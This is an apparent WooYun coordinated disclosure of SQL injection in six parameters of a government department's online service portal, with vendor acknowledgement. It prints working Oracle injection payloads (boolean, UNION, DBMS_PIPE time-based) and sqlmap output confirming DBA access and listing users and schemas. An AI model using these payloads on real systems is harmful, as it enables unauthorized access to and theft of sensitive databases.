当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145934

漏洞标题:某敏感部门网上办事大厅另一端口多个参数存在SQL注入(DBA权限+涉及27个数据库+大量数据可泄露)之三

相关厂商:公安部一所

漏洞作者: 路人甲

提交时间:2015-10-11 14:09

修复时间:2015-11-28 11:36

公开时间:2015-11-28 11:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(公安部一所)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-11: 细节已通知厂商并且等待厂商处理中
2015-10-14: 厂商已经确认,细节仅向厂商公开
2015-10-24: 细节向核心白帽子及相关领域专家公开
2015-11-03: 细节向普通白帽子公开
2015-11-13: 细节向实习白帽子公开
2015-11-28: 细节向公众公开

简要描述:

另外一端口,多个多处存在SQL注入,DBA权限,27个数据库。IP地址请帮忙打码,另外如有敏感信息,请管理员帮忙打码!
这次测试了六个,有些参数跟之前提交过的是同一个,但是在不同的地方,测试得到的type也有一些差异,不多解释,你们懂的。

详细说明:

注入点一:

**.**.**.**:8000/self/xzList.jsp?sid=4028811932a87caf0132a89ac07f0010


该处的sid也存在注入

Place: GET
Parameter: sid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sid=4028811932a87caf0132a89ac07f0010' AND 5409=5409 AND 'CEQy'='CEQ
y
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: sid=4028811932a87caf0132a89ac07f0010' UNION ALL SELECT NULL,CHR(113
)||CHR(105)||CHR(114)||CHR(120)||CHR(113)||CHR(113)||CHR(101)||CHR(73)||CHR(98)|
|CHR(97)||CHR(88)||CHR(86)||CHR(122)||CHR(110)||CHR(102)||CHR(113)||CHR(114)||CH
R(120)||CHR(103)||CHR(113) FROM DUAL--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: sid=4028811932a87caf0132a89ac07f0010' AND 1846=DBMS_PIPE.RECEIVE_ME
SSAGE(CHR(65)||CHR(99)||CHR(81)||CHR(87),5) AND 'PObA'='PObA
---
[00:53:47] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[00:53:47] [INFO] fetching current user
current user:    'NOTA'
[00:53:47] [INFO] fetching current database
[00:53:47] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'NOTA'
[00:53:47] [INFO] testing if current user is DBA
current user is DBA:    True


1.jpg


database management system users [37]:
[*] ANONYMOUS
[*] BI
[*] CGS
[*] CTXSYS
[*] DBORACLE
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] NOTA
[*] NOTA_TEMP
[*] NOTADT
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OTATARGET
[*] OUTLN
[*] PM
[*] QS_ERP
[*] SCOTT
[*] SH
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEBOTA
[*] WEBOTABASE
[*] WMSYS
[*] WSPCS
[*] XDB


available databases [27]:
[*] CGS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDSYS
[*] NOTA
[*] NOTA_TEMP
[*] NOTADT
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEBOTA
[*] WEBOTABASE
[*] WMSYS
[*] WSPCS
[*] XDB


Database: HR
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| EMPLOYEES   | 107     |
| DEPARTMENTS | 27      |
| COUNTRIES   | 25      |
| LOCATIONS   | 23      |
| JOBS        | 19      |
| JOB_HISTORY | 10      |
| REGIONS     | 4       |
+-------------+---------+


2.jpg


3.jpg


4.jpg


5.jpg


6.jpg


数据信息量很大,就不继续了!测试其他地方的参数吧!~~~
注入点二:

**.**.**.**:8000/self/xz.jsp?sid=4028811932a87caf0132a89ac07f0010


这个页面的sid也存在注入跟上面注入的少了一个type

GET parameter 'sid' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] y
sqlmap identified the following injection points with a total of 37 HTTP(s) requ
ests:
---
Place: GET
Parameter: sid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sid=4028811932a87caf0132a89ac07f0010' AND 8445=8445 AND 'fwSz'='fwS
z
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: sid=4028811932a87caf0132a89ac07f0010' AND 7617=DBMS_PIPE.RECEIVE_ME
SSAGE(CHR(68)||CHR(68)||CHR(99)||CHR(120),5) AND 'DkvG'='DkvG
---
[01:10:34] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[01:10:34] [INFO] fetching current user
[01:10:34] [INFO] retrieving the length of query output
[01:10:34] [INFO] retrieved: 4
[01:10:36] [INFO] retrieved: NOTA
current user:    'NOTA'
[01:10:36] [INFO] fetching current database
[01:10:36] [INFO] retrieving the length of query output
[01:10:36] [INFO] resumed: 4
[01:10:36] [INFO] resumed: NOTA
[01:10:36] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'NOTA'
[01:10:36] [INFO] testing if current user is DBA
current user is DBA:    True


7.jpg


注入点三:

**.**.**.**:8000/self/projectinfo.jsp?sid=4028811932a87caf0132a89ac07f0010


此页面的sid也存在注入

GET parameter 'sid' is vulnerable. Do you want to keep testing the others (if an
y)? [y/N] y
sqlmap identified the following injection points with a total of 23 HTTP(s) requ
ests:
---
Place: GET
Parameter: sid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sid=4028811932a87caf0132a89ac07f0010' AND 2155=2155 AND 'aONo'='aON
o
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: sid=4028811932a87caf0132a89ac07f0010' AND 2996=DBMS_PIPE.RECEIVE_ME
SSAGE(CHR(119)||CHR(117)||CHR(69)||CHR(80),5) AND 'RtFc'='RtFc
---
[01:12:56] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[01:12:56] [INFO] fetching current user
[01:12:56] [INFO] retrieving the length of query output
[01:12:56] [INFO] retrieved: 4
[01:12:59] [INFO] retrieved: NOTA
current user:    'NOTA'
[01:12:59] [INFO] fetching current database
[01:12:59] [INFO] retrieving the length of query output
[01:12:59] [INFO] resumed: 4
[01:12:59] [INFO] resumed: NOTA
[01:12:59] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'NOTA'
[01:12:59] [INFO] testing if current user is DBA
current user is DBA:    True


8.jpg


注入点四:

**.**.**.**:8000/self/addWssb.jsp?keyid=PJ201411141324100375


keyid存在注入

GET parameter 'keyid' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] y
sqlmap identified the following injection points with a total of 29 HTTP(s) requ
ests:
---
Place: GET
Parameter: keyid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keyid=PJ201411141324100375' AND 7033=7033 AND 'fABa'='fABa
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: keyid=PJ201411141324100375' AND 7251=DBMS_PIPE.RECEIVE_MESSAGE(CHR(
104)||CHR(100)||CHR(77)||CHR(100),5) AND 'ydIE'='ydIE
---
[01:29:18] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[01:29:18] [INFO] fetching current user
[01:29:18] [INFO] retrieving the length of query output
[01:29:18] [INFO] retrieved: 4
[01:29:23] [INFO] retrieved: NOTA
current user:    'NOTA'
[01:29:23] [INFO] fetching current database
[01:29:23] [INFO] retrieving the length of query output
[01:29:23] [INFO] resumed: 4
[01:29:23] [INFO] resumed: NOTA
[01:29:23] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'NOTA'
[01:29:23] [INFO] testing if current user is DBA
current user is DBA:    True


9.jpg


注入点五

**.**.**.**:8000/self/fckEditPage.jsp?docId=TB201112241456590953&mat=1


docId存在盲注

sqlmap identified the following injection points with a total of 145 HTTP(s) req
uests:
---
Place: GET
Parameter: docId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: docId=TB201112241456590953' AND 1377=1377 AND 'SVwx'='SVwx&mat=1
---
[01:43:55] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[01:43:55] [INFO] fetching current user
[01:43:55] [INFO] retrieving the length of query output
[01:43:55] [INFO] retrieved: 4
[01:44:07] [INFO] retrieved: NOTA
current user:    'NOTA'
[01:44:07] [INFO] fetching current database
[01:44:07] [INFO] retrieving the length of query output
[01:44:07] [INFO] resumed: 4
[01:44:07] [INFO] resumed: NOTA
[01:44:07] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'NOTA'
[01:44:07] [INFO] testing if current user is DBA
current user is DBA:    True


10.jpg


注入点六

**.**.**.**:8000/list.jsp?flag=治安&tn=2&pn=3&xiangmu=1


flag存在注入,但是获取的信息有问题,估计的绕过才行,就不进行绕过了~~~还是连接数据库时出现问题?
测试完后访问
**.**.**.**:8000/list.jsp?flag=禁毒</code>
返回错误信息,得到内网IP,数据库地址。

OTA DB init error:从数据源建立数据库连接时出错:Listener refused the connection with the following error: ORA-12519, 
TNS:no appropriate service handler found The Connection descriptor used by the client was: **.**.**.**:1521:orcl


sqlmap identified the following injection points with a total of 335 HTTP(s) req
uests:
---
Place: GET
Parameter: flag
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: flag=??') AND 7500=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(112)||CHR
(113)||CHR(74),5) AND ('DxMV'='DxMV&tn=2&pn=3&xiangmu=1
---
[01:53:51] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[01:53:51] [INFO] fetching current user
[01:53:51] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[01:53:51] [INFO] retrieved:
[01:53:51] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
[01:53:51] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user:   None
[01:53:51] [INFO] fetching current database
[01:53:51] [INFO] retrieved:
[01:53:52] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):      None
[01:53:52] [INFO] testing if current user is DBA
current user is DBA:    False


11.jpg


该端口的参数基本测试了完了,剩下的再找找看有时间,或者部分参数看似不能注入的能否增加级别或者绕过注入了!~~~

漏洞证明:

2.jpg


3.jpg


4.jpg


5.jpg


6.jpg

修复方案:

过滤
权限限制

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-10-14 11:35

厂商回复:

感谢提交!!
验证确认所描述的问题,已通知其修复。

最新状态:

暂无